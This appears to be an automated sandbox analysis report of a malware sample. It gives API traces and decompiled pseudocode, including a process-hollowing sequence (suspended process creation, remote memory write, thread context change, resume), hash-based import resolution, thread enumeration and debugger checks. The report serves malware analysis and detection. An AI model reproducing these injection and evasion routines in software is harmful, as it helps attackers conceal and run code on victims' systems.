VirtualAllocEx.KERNELBASE(?,00000000,00000042,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 0044B0D9
WriteProcessMemory.KERNELBASE(?,?,00000044,00000042,00000000), ref: 0044B19D
VirtualProtectEx.KERNELBASE(?,?,00000042,00000010,00000000), ref: 0044B1FB
SetThreadContext.KERNEL32(?,?), ref: 0044B232
VirtualProtectEx.KERNELBASE(?,?,?,00000000,00000000), ref: 0044B26B
ResumeThread.KERNELBASE(?), ref: 0044B2B2
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0044AF2E

Part of subcall function 0044BF50: LoadLibraryA.KERNEL32(?), ref: 0044C1A1

ExitProcess.KERNEL32(00000000), ref: 0044B2CE

Strings

D, xrefs: 0044AEE1

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID: ProcessVirtual$AllocMemoryProtectThreadWrite$ContextCreateExitLibraryLoadResume
String ID: D
API String ID: 2854380510-2746444292
Opcode ID: 0dc18d23c77a8731be61081099baafc6e25e98735f8222011663ed27e95c8038
Instruction ID: ed055bbd9c29ae7acdf35baa9796679fc3d5ebf721d66c985a19f9a3a620d4ec
Opcode Fuzzy Hash: 0dc18d23c77a8731be61081099baafc6e25e98735f8222011663ed27e95c8038
Instruction Fuzzy Hash: 85C1ECF1D402146BFF10ABB59C43FAE7674EF54719F140029F918B6283EAB55D0487BA

Uniqueness

Uniqueness Score: -1.00%

Function 00520D28, Relevance: 13.8, APIs: 9, Instructions: 318memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,00000920,00003000,00000040,00000920,00520780), ref: 00520DE5
VirtualAlloc.KERNEL32(00000000,000005EB,00003000,00000040,005207E1), ref: 00520E1C
VirtualAlloc.KERNEL32(00000000,00022439,00003000,00000040), ref: 00520E7C
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00520EB2
VirtualProtect.KERNEL32(00440000,00000000,00000004,00520D07), ref: 00520FB7
VirtualProtect.KERNEL32(00440000,00001000,00000004,00520D07), ref: 00520FDE
VirtualProtect.KERNEL32(00000000,?,00000002,00520D07), ref: 005210AB
VirtualProtect.KERNEL32(00000000,?,00000002,00520D07,?), ref: 00521101
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0052111D

Memory Dump Source

Source File: 00000004.00000002.2169165988.0000000000520000.00000040.00020000.sdmp, Offset: 00520000, based on PE: false

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 046c22bfd6cc6457a861a1a9c923bc078a3a1c54b33ff9aed95f43ed8304fc38
Instruction ID: efd8c826306509814f7da78ca07ddd2174c9eaeaf77628ff1fe06c66fa7d8e18
Opcode Fuzzy Hash: 046c22bfd6cc6457a861a1a9c923bc078a3a1c54b33ff9aed95f43ed8304fc38
Instruction Fuzzy Hash: 2ED18E721012409FEB15CF04C885B6A7BAAFFD9310B295194ED899F39FDB30B850CB66

Uniqueness

Uniqueness Score: -1.00%

Function 0045DA20, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045DA20() {
				char _v28;
				void* _t4;

				_t4 = CreateEventW(0, 1, 0, E00447200(0x4605f8,  &_v28));
				if(_t4 != 0) {
					SetEvent(_t4);
					_t4 = CloseHandle(_t4); // executed
				}
				SetLastError(0);
				return _t4;
			}

0x0045da3f
0x0045da47
0x0045da4c
0x0045da53
0x0045da53
0x0045da5b
0x0045da66

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,0CD06773,?,-00461D33,?,004491EB,-00461D33,?,004477A1,00000001), ref: 0045DA3F
SetEvent.KERNEL32(00000000,?,?,0CD06773,?,-00461D33,?,004491EB,-00461D33,?,004477A1,00000001,?,-00461D33,?,00446A74), ref: 0045DA4C
CloseHandle.KERNEL32(00000000), ref: 0045DA53
SetLastError.KERNEL32(00000000,?,?,0CD06773,?,-00461D33,?,004491EB,-00461D33,?,004477A1,00000001,?,-00461D33,?,00446A74), ref: 0045DA5B

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID: Event$CloseCreateErrorHandleLast
String ID:
API String ID: 2055590504-0
Opcode ID: 46c8238138c97ad84bce9a152e67df99b1886497eed1a39bf63b2cb7180fa926
Instruction ID: 90f5f323c545ba599f915ea8a0464aac8abec59575bb43be33e1847d06645272
Opcode Fuzzy Hash: 46c8238138c97ad84bce9a152e67df99b1886497eed1a39bf63b2cb7180fa926
Instruction Fuzzy Hash: FCE01271644214B7E61037E57C0AF6B362C9B00746F440061FB0DD9182F6D5545486BF

Uniqueness

Uniqueness Score: -1.00%

Function 0050914E, Relevance: 3.0, APIs: 2, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,00506F5C,00000001), ref: 0050915F
HeapDestroy.KERNEL32 ref: 00509195

Memory Dump Source

Source File: 00000004.00000002.2169048342.0000000000466000.00000020.00020000.sdmp, Offset: 00466000, based on PE: false

Similarity

API ID: Heap$CreateDestroy
String ID:
API String ID: 3296620671-0
Opcode ID: b4197b8ce202e9574b8449a1b3ae388d29d22486b9a77df4d182e90d517e80b7
Instruction ID: 63b69394adc16d47ee08922686f80e95ab7e6105ba654ec303655489938ceee8
Opcode Fuzzy Hash: b4197b8ce202e9574b8449a1b3ae388d29d22486b9a77df4d182e90d517e80b7
Instruction Fuzzy Hash: 41E06D727A43029FEB109B70AC0D72D39A8FB64746F108829F001C51E5F7B18588BE09

Uniqueness

Uniqueness Score: -1.00%

Function 0045D770, Relevance: 3.0, APIs: 2, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045D770() {
				char _v22;

				GetConsoleCP();
				GetFileAttributesW(E00447200(0x4605f8,  &_v22)); // executed
				return GetCapture();
			}

0x0045d776
0x0045d78e
0x0045d798

APIs

GetConsoleCP.KERNEL32 ref: 0045D776
GetFileAttributesW.KERNELBASE(00000000,?,?,?,?,?,?,0044AE51), ref: 0045D78E

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesConsoleFile
String ID:
API String ID: 1533235433-0
Opcode ID: bd1bdb9da1b4e98a93457fe0edd080ac30947099fded1d0531f2ba2b787165a8
Instruction ID: a60592c14bca256f3e63f4a2fd764726132d8f469e01e6d4663cb95995cf5f14
Opcode Fuzzy Hash: bd1bdb9da1b4e98a93457fe0edd080ac30947099fded1d0531f2ba2b787165a8
Instruction Fuzzy Hash: 4FD0C9B1844209EBD64077A9BC0EA2B376CAA0420AB4504B1ED1A95112F6ED95698BBF

Uniqueness

Uniqueness Score: -1.00%

Function 0045B1B0, Relevance: 1.5, APIs: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0045B1B0(intOrPtr _a4) {
				void* _t5;
				void* _t7;
				intOrPtr _t8;

				_t8 = _a4;
				_t13 = _t8;
				if(_t8 == 0) {
					__eflags = 0;
					return 0;
				}
				_t5 = E00449D50(0xfef6f706);
				E0044BF50(_t13, 0, 0x8685de3);
				_t7 = RtlAllocateHeap( *0x462124, 0, _t8 + _t5 + 0x657d085a); // executed
				return _t7;
			}

0x0045b1b4
0x0045b1b7
0x0045b1b9
0x0045b1eb
0x00000000
0x0045b1eb
0x0045b1c0
0x0045b1d6
0x0045b1e7
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00000000,?), ref: 0045B1E7

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 5f042299e5ae864947cb5f9f0c4b03bd2e4856f7a2a783b932ebf42a821da8a0
Instruction ID: 1c5a0541f518f6099f8f7bdc77689645c100876e50f2c7735adf145c933d255c
Opcode Fuzzy Hash: 5f042299e5ae864947cb5f9f0c4b03bd2e4856f7a2a783b932ebf42a821da8a0
Instruction Fuzzy Hash: F2E07D3390412477D6503AD0AC23F873B48CF017A5F010021FD0CA3212E6407A0882EE

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 004569A0, Relevance: 7.6, APIs: 5, Instructions: 65
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004569A0(void* __eflags) {
				intOrPtr _v32;
				signed int _v36;
				void* _v44;
				signed char _t13;
				signed int _t16;
				signed int _t19;
				long _t23;
				void* _t24;
				void* _t25;
				void* _t27;

				_t24 = CreateToolhelp32Snapshot(4, 0);
				_v44 = E00449D50(0x647400b0);
				_t23 = GetCurrentProcessId();
				_t13 = E004455C0(Thread32First(_t24,  &_v44), 0);
				_t27 = _t25 + 0xc;
				if((_t13 & 0x00000001) != 0) {
					L6:
					_t19 = 0;
				} else {
					0;
					0;
					while(GetLastError() != 0x12) {
						_t16 = E004455C0(_v32, _t23);
						_t27 = _t27 + 8;
						_t19 =  ~(_t16 & 0x00000001) & _v36;
						if(Thread32Next(_t24,  &_v44) != 0) {
							if(_t19 == 0) {
								continue;
							} else {
							}
						}
						goto L7;
					}
					goto L6;
				}
				L7:
				return _t19;
			}

0x004569b2
0x004569c1
0x004569ca
0x004569d9
0x004569de
0x004569e3
0x00456a25
0x00456a25
0x004569eb
0x004569eb
0x004569ef
0x004569f0
0x004569ff
0x00456a04
0x00456a11
0x00456a1d
0x00456a21
0x00000000
0x00000000
0x00456a23
0x00456a21
0x00000000
0x00456a1d
0x00000000
0x004569f0
0x00456a27
0x00456a30

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 004569AD
GetCurrentProcessId.KERNEL32 ref: 004569C4
Thread32First.KERNEL32(00000000,?), ref: 004569D1
GetLastError.KERNEL32 ref: 004569F0
Thread32Next.KERNEL32(00000000,?), ref: 00456A16

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread32$CreateCurrentErrorFirstLastNextProcessSnapshotToolhelp32
String ID:
API String ID: 1709709923-0
Opcode ID: 216f2950889c685a66cca638a7907b20e61537c528b0b135ac4a37d3b296011f
Instruction ID: 16fbe42a4235d3521fe75b9f4cbacabec188b8dbcbb66df6bbfb6a182ece0f43
Opcode Fuzzy Hash: 216f2950889c685a66cca638a7907b20e61537c528b0b135ac4a37d3b296011f
Instruction Fuzzy Hash: A201D872A5020467DB0176A5AC86BEF3A6CAB42319F480036FD04A2113E51D8D09817A

Uniqueness

Uniqueness Score: -1.00%

Function 0050ABA4, Relevance: 7.6, APIs: 5, Instructions: 57COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0050ED8D
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0050EDA2
UnhandledExceptionFilter.KERNEL32(0051DBB4), ref: 0050EDAD
GetCurrentProcess.KERNEL32(C0000409), ref: 0050EDC9
TerminateProcess.KERNEL32(00000000), ref: 0050EDD0

Memory Dump Source

Source File: 00000004.00000002.2169048342.0000000000466000.00000020.00020000.sdmp, Offset: 00466000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 7c8b744fb502ea16c809bed66df2c2356b267baa3c386910605aa8dda353dc24
Instruction ID: 9ba82deb04ae6f863b2a8707afa56160046d36efc869e36bd6f4364efecaecaf
Opcode Fuzzy Hash: 7c8b744fb502ea16c809bed66df2c2356b267baa3c386910605aa8dda353dc24
Instruction Fuzzy Hash: F621B778911604DFD708DF64FD496483BB4BB28345F506019E508873A0F7B6658DEF95

Uniqueness

Uniqueness Score: -1.00%

Function 0044D830, Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 280
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E0044D830(signed int _a4, intOrPtr _a8) {
				signed short* _v20;
				CHAR* _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				signed int _v40;
				char _v140;
				void* _t78;
				void* _t79;
				void* _t83;
				void* _t93;
				signed short* _t100;
				signed short* _t102;
				void* _t105;
				void* _t112;
				char _t113;
				signed short* _t114;
				void* _t115;
				void* _t120;
				signed int _t122;
				signed int _t124;
				signed int _t133;
				void* _t135;
				intOrPtr _t136;
				signed int _t137;
				signed int _t139;
				_Unknown_base(*)()* _t141;
				char* _t143;
				signed int _t144;
				void* _t149;
				signed short* _t153;
				signed int _t155;
				intOrPtr _t159;
				void* _t160;
				signed char* _t161;
				void* _t165;
				intOrPtr _t166;
				_Unknown_base(*)()* _t170;
				signed short* _t173;
				CHAR* _t174;
				signed int _t175;
				void* _t176;
				void* _t177;
				void* _t178;
				void* _t180;
				void* _t183;
				void* _t187;
				void* _t191;
				void* _t192;
				void* _t199;

				_t133 = _a4;
				_t141 = 0;
				_t204 = _t133;
				if(_t133 != 0) {
					_t78 = E004512D0(_t204, _t133);
					_t149 = _t78;
					_t165 =  *((intOrPtr*)(_t78 + 0x60)) + _t133;
					_t79 = E00449D50(0x975b6640);
					_t141 = 0;
					_t180 = _t178 + 8;
					_t205 =  *((intOrPtr*)(_t79 + _t165 + 0xcd0992c));
					if( *((intOrPtr*)(_t79 + _t165 + 0xcd0992c)) != 0) {
						_t6 = _t165 + 0xcd09914; // 0xcd09914
						_t166 = _t79 + _t6;
						_v36 =  *((intOrPtr*)(_t149 + 0x64));
						_t153 =  *((intOrPtr*)(_t166 + 0x24)) + _t133 - E00449D50(0x60421690) + 0x436163c;
						_v32 = _t166;
						_t83 = E00441460(_t205, E00441460(_t205,  *((intOrPtr*)(_t166 + 0x20)), 0x5eaee274), _t133);
						_t183 = _t180 + 0x14;
						_v40 =  ~_t133;
						_t143 = _t83 + 0xa1511d8c;
						_t135 = 0;
						0;
						do {
							_v20 = _t153;
							_v24 = _t143;
							_t155 =  ~(E00441460(0,  ~( *_t143), _v40));
							E00441460(0,  *_t143, _a4);
							E00458F20( &_v140, E00449D50(0x647400c8));
							_t187 = _t183 + 0x1c;
							_t91 =  *_t155;
							if( *_t155 != 0) {
								_t176 = 0;
								do {
									 *((char*)(_t177 + _t176 - 0x88)) = E0045D680(0, _t91);
									_t176 = _t176 - E004422E0(0, 0, 1);
									E00441460(0, _t176, 1);
									_t187 = _t187 + 0x14;
									_t91 =  *(_t155 + _t176) & 0x000000ff;
								} while (( *(_t155 + _t176) & 0x000000ff) != 0);
							}
							_push(0xffffffff);
							_t93 = E004500A0( &_v140);
							_t183 = _t187 + 8;
							if(_t93 == _a8) {
								_t136 = _v32;
								_t170 = E00441460(__eflags, 0x637bf4a0 +  *((intOrPtr*)( *((intOrPtr*)(_t136 + 0x1c)) + _a4 - E00449D50(0xffb90b0) + 0x6b8f901c + ( *_v20 & 0x0000ffff) * 4)), _a4) + 0x9c840b60;
								_t100 = E004422E0(__eflags, _t136, 0x52cc09fc);
								_t159 = _v36;
								_v20 = _t100;
								E00441460(__eflags, _t136, _t159);
								_t141 = _t170;
								_t191 = _t183 + 0x1c;
								__eflags = _t170 - _t136;
								if(_t170 > _t136) {
									_t102 = _v20;
									__eflags = _t141 - _t159 + _t102 + 0x52cc09fc;
									if(_t141 < _t159 + _t102 + 0x52cc09fc) {
										_v24 =  *_t141;
										_v20 = _t141;
										_t105 = E00447DD0(0x82);
										_t192 = _t191 + 4;
										_t144 = _v24;
										_t137 = 0;
										__eflags = _t144 - _t105;
										if(_t144 != _t105) {
											_t122 = _t144;
											_t175 = 0;
											__eflags = 0;
											0;
											do {
												 *(_t177 + _t175 - 0x88) = _t122;
												_t124 = E00441460(__eflags, E004422E0(__eflags, 0, _t175), 0xffffffff);
												_t137 =  ~_t124;
												E00441460(__eflags, _t175, 1);
												_t192 = _t192 + 0x18;
												_t175 = _t137;
												_t122 =  *(_v20 - _t124) & 0x000000ff;
												__eflags = _t122 - 0x2e;
											} while (__eflags != 0);
										}
										_t160 = E00441460(__eflags, _t137, E00449D50(0x3638cbc4));
										E00441460(__eflags, _t137, 1);
										_v24 = _v20 + _t160 - 0x524ccb67;
										 *((char*)(_t177 + _t137 - 0x88)) = E00447DD0(0x82);
										 *((char*)(_t177 + _t160 - 0x524ccbef)) = 0x64;
										_t112 = E00449D50(0x8707952b);
										 *((char*)(_t177 + _t137 - 0x86)) = 0x6c;
										_t113 = E00447DD0(0xc0);
										_v28 = 0;
										 *((char*)(_t137 - _t112 +  &_v140 - 0x1c8c6a76)) = _t113;
										_t114 = _v20;
										 *((char*)(_t177 + _t137 - 0x84)) = 0;
										_t173 = _t114;
										_t115 = E00447DD0(0x8f);
										_t199 = _t192 + 0x24;
										__eflags =  *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) - _t115;
										if( *((intOrPtr*)(_t114 + _t160 - 0x524ccb67)) != _t115) {
											_t174 = _v24;
										} else {
											_t139 = _v24[1];
											__eflags = _t139;
											if(_t139 == 0) {
												_t174 =  &_v28;
											} else {
												_t161 = _t160 + _t173 - 0x524ccb65;
												do {
													_t120 = E004455A0(_v28, 0xa);
													_t199 = _t199 + 8;
													_v28 = _t139 + _t120 - 0x30;
													_t139 =  *_t161 & 0x000000ff;
													_t161 =  &(_t161[1]);
													__eflags = _t139;
												} while (_t139 != 0);
												_t174 =  &_v28;
											}
										}
										_t141 = GetProcAddress(LoadLibraryA( &_v140), _t174);
									}
								}
							} else {
								goto L7;
							}
							goto L22;
							L7:
							_t135 = _t135 + 1;
							_t143 =  &(_v24[4]);
							_t153 =  &(_v20[1]);
						} while (_t135 <  *((intOrPtr*)(_v32 + 0x18)));
						_t141 = 0;
					}
				}
				L22:
				return _t141;
			}

0x0044d839
0x0044d83c
0x0044d83e
0x0044d840
0x0044d847
0x0044d852
0x0044d854
0x0044d85b
0x0044d860
0x0044d862
0x0044d865
0x0044d86d
0x0044d873
0x0044d873
0x0044d880
0x0044d894
0x0044d89f
0x0044d8af
0x0044d8b4
0x0044d8bb
0x0044d8be
0x0044d8c4
0x0044d8cc
0x0044d8d0
0x0044d8d2
0x0044d8d5
0x0044d8ea
0x0044d8f0
0x0044d90d
0x0044d912
0x0044d915
0x0044d919
0x0044d91b
0x0044d920
0x0044d92c
0x0044d942
0x0044d944
0x0044d949
0x0044d94c
0x0044d950
0x0044d920
0x0044d954
0x0044d95d
0x0044d962
0x0044d968
0x0044d98d
0x0044d9c4
0x0044d9d0
0x0044d9d8
0x0044d9db
0x0044d9e0
0x0044d9e5
0x0044d9e7
0x0044d9ea
0x0044d9ec
0x0044d9f2
0x0044d9fc
0x0044d9fe
0x0044da06
0x0044da0e
0x0044da11
0x0044da16
0x0044da19
0x0044da1c
0x0044da1e
0x0044da20
0x0044da22
0x0044da24
0x0044da24
0x0044da2c
0x0044da30
0x0044da30
0x0044da45
0x0044da51
0x0044da56
0x0044da5b
0x0044da61
0x0044da65
0x0044da68
0x0044da68
0x0044da30
0x0044da83
0x0044da88
0x0044da9a
0x0044daaa
0x0044dab1
0x0044dabe
0x0044dac8
0x0044dad7
0x0044dae5
0x0044daec
0x0044daf3
0x0044daf6
0x0044db05
0x0044db0c
0x0044db11
0x0044db14
0x0044db16
0x0044db54
0x0044db18
0x0044db1e
0x0044db21
0x0044db23
0x0044db59
0x0044db25
0x0044db25
0x0044db30
0x0044db35
0x0044db3a
0x0044db44
0x0044db47
0x0044db4a
0x0044db4b
0x0044db4b
0x0044db4f
0x0044db4f
0x0044db23
0x0044db70
0x0044db70
0x0044d9fe
0x00000000
0x00000000
0x00000000
0x00000000
0x0044d96a
0x0044d973
0x0044d974
0x0044d977
0x0044d97a
0x0044d983
0x0044d983
0x0044d86d
0x0044db72
0x0044db7b

APIs

LoadLibraryA.KERNEL32(?), ref: 0044DB62
GetProcAddress.KERNEL32(00000000,?), ref: 0044DB6A

Strings

l, xrefs: 0044DAC8
d, xrefs: 0044DAB1

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressLibraryLoadProc
String ID: d$l
API String ID: 2574300362-91452987
Opcode ID: e23457f16b003a1a1c47e359b7437fbd818389b2714679dc03668f422a0e0b1f
Instruction ID: ebee7871e0d4b44c039dcfdc97af6eefb3db659ce3ec2c4fec578221206bbcd6
Opcode Fuzzy Hash: e23457f16b003a1a1c47e359b7437fbd818389b2714679dc03668f422a0e0b1f
Instruction Fuzzy Hash: 1F913BB6D001159BEF109FB4AC42ABF7764AF1531CF05006AEC49B7353E639AE0587AA

Uniqueness

Uniqueness Score: -1.00%

Function 00441A00, Relevance: 3.0, APIs: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00441A00() {
				intOrPtr _t9;
				WCHAR* _t10;
				struct HINSTANCE__* _t15;

				_t9 =  *0x4620d8; // 0x53325ec4
				_t10 = _t9 + 0xffffffd4;
				_t15 = (_t10 | 0x00000008) * _t10;
				CreateDialogParamW(_t15, _t10, _t15, _t15, _t15);
				GetVersion();
				return (_t10 * (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10) ^ 0xffffffb4) + (_t15 + (_t15 + _t15 ^ 0x00000032) | _t10);
			}

0x00441a06
0x00441a0c
0x00441a15
0x00441a1d
0x00441a39
0x00441a47

APIs

CreateDialogParamW.USER32 ref: 00441A1D
GetVersion.KERNEL32(?,00448614,0000031F,?,00446AB1,?,0044AE51), ref: 00441A39

Memory Dump Source

Source File: 00000004.00000002.2168999762.0000000000441000.00000020.00020000.sdmp, Offset: 00440000, based on PE: true

Associated: 00000004.00000002.2168995150.0000000000440000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169028711.0000000000460000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2169036281.0000000000462000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2169042935.0000000000465000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDialogParamVersion
String ID:
API String ID: 1068622756-0
Opcode ID: c9b0f6c6636f28b97d2f267426662f2de51f3e2c7814e12676c8f2e1ef637182
Instruction ID: 1d824e7fff2b270ba2169c6cb6e73254803abfad046ab842d38b462b4e475b8e
Opcode Fuzzy Hash: c9b0f6c6636f28b97d2f267426662f2de51f3e2c7814e12676c8f2e1ef637182
Instruction Fuzzy Hash: C5E092236039386B52108A6FADC4C97FF9CDE421AA3020237FA5CD36A0E1908C0886F9

Uniqueness

Uniqueness Score: -1.00%

Function 0045DA70, Relevance: .7, Instructions: 746
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E0045DA70(void* __ecx, signed int __edx, void* __eflags, signed int _a4, intOrPtr _a8, signed int* _a12, void* _a16) {
				unsigned int _v20;
				signed int _v24;
				signed int* _v28;
				signed int _v32;
				signed int _v36;
				signed int* _v40;
				signed int _v44;
				signed int _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				signed int _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				signed int _v124;
				signed int _v128;
				void* _t304;
				signed int _t305;
				signed int _t309;
				void* _t311;
				signed int _t314;
				signed int _t317;
				signed int* _t319;
				signed int _t328;
				signed int _t329;
				void* _t331;
				void* _t336;
				void* _t338;
				void* _t344;
				intOrPtr _t347;
				void* _t355;
				signed int _t358;
				void* _t360;
				signed int _t366;
				signed int _t368;
				void* _t369;
				signed int _t376;
				signed int* _t377;
				signed int _t379;
				signed int _t380;
				void* _t383;
				signed int _t387;
				void* _t396;
				void* _t401;
				signed int _t408;
				void* _t409;
				void* _t410;
				void* _t412;
				intOrPtr _t414;
				void* _t415;
				signed int _t418;
				signed int _t421;
				void* _t425;
				void* _t426;
				signed char _t427;
				signed int _t432;
				intOrPtr _t434;
				signed char _t444;
				signed int _t445;
				intOrPtr _t450;
				signed int _t457;
				signed int _t459;
				signed int _t460;
				signed int* _t461;
				signed int* _t463;
				signed int _t464;
				signed int _t465;
				signed int* _t466;
				signed int _t471;
				signed int _t472;
				intOrPtr* _t475;
				signed int* _t476;
				signed int _t478;
				signed int _t479;
				signed int _t481;
				signed int* _t484;
				unsigned int _t486;
				unsigned int _t490;
				signed int _t491;
				intOrPtr _t492;
				signed int _t495;
				signed int _t498;
				signed int _t502;
				signed int _t503;
				signed int _t506;
				signed char _t507;
				intOrPtr* _t510;
				signed int _t525;
				signed int _t527;
				signed int _t532;
				signed int _t533;
				signed int _t542;
				signed int _t543;
				intOrPtr _t549;
				intOrPtr* _t551;
				signed int _t552;
				void* _t566;
				signed int _t569;
				signed int _t570;
				signed int* _t576;
				signed int _t581;
				signed int _t582;
				signed int* _t584;
				signed int _t586;
				signed int _t590;
				signed int _t592;
				signed int _t595;
				signed int _t599;
				void* _t600;
				void* _t602;
				void* _t604;
				void* _t606;
				void* _t621;
				void* _t629;
				void* _t632;
				void* _t633;
				void* _t634;
				void* _t635;

				_t532 = __edx;
				_t455 = _a12;
				_t584 = E0045EC10();
				_v28 = E0045EC10();
				_t549 = E0045EC10();
				_v68 = E0045EC10();
				_v40 = E0045EC10();
				_v80 = E0045EC10();
				_t304 = E0045E3C0(__ecx, __eflags, _a12, _a16);
				_t602 = _t600 - 0x70 + 8;
				if(_t304 == 0) {
					_t305 = E0045EBE0(_t455);
					_t602 = _t602 + 4;
					__eflags = _t305;
					if(_t305 == 0) {
						_v64 = _t549;
						_v52 = _t584;
						_t457 =  *_a16;
						__eflags = _t457 - 1;
						if(__eflags != 0) {
							_v24 =  *_a12;
							_t490 = E00441460(__eflags,  *_a12 - 0x1a86f375, 0x1a86f376);
							_t309 = _a4;
							_v44 = _t457;
							_v20 = _t490;
							_t56 = _t490 + 0x3df43c37; // 0x3df43c37
							_t311 = E004422E0(__eflags, _t56, _t457);
							_t604 = _t602 + 0x10;
							_t459 = _t311 + 0xc20bc3c9;
							__eflags =  *((intOrPtr*)(_t309 + 4)) - _t459;
							if( *((intOrPtr*)(_t309 + 4)) < _t459) {
								_t432 = _a4;
								_t581 = _t432;
								 *(_t432 + 4) = _t459;
								_t434 = E00443F90( *((intOrPtr*)(_t581 + 8)), _t459 * 4);
								_t604 = _t604 + 8;
								 *((intOrPtr*)(_t581 + 8)) = _t434;
							}
							_t551 = _v28;
							E00447D70(_a12, _t551);
							E00447D70(_a16, _t584);
							_t606 = _t604 + 0x10;
							_t314 =  *_t584;
							_t491 = _t584[2];
							_v32 = _t459;
							__eflags =  *(_t491 + _t314 * 4 - 4);
							if( *(_t491 + _t314 * 4 - 4) < 0) {
								_v56 = 0;
								_t460 = 1;
								goto L25;
							} else {
								_t525 = 0;
								__eflags = 0;
								_t481 = 1;
								do {
									_v56 = (_t525 << 0x00000020 | _t481) << 1;
									_v60 = _t481 + _t481;
									E0045E320(_t584, 0x462028);
									_t425 = E00441460(__eflags, E00449D50(0xfa78285f) +  *_t584, 0xffffffff);
									_t426 = E00449D50(0xfa78285f);
									_t481 = _v60;
									_t427 = E00446BB0(__eflags,  *((intOrPtr*)(_t584[2] + (_t425 - _t426) * 4)), 0xffffffff);
									_t525 = _v56;
									_t606 = _t606 + 0x20;
									__eflags = _t427 & 0x00000001;
								} while ((_t427 & 0x00000001) != 0);
								__eflags = _t481 | _t525;
								if((_t481 | _t525) == 0) {
									_t551 = _v28;
									_t460 = 0;
									__eflags = 0;
									_v56 = 0;
								} else {
									E0045E610(_v64, _t481);
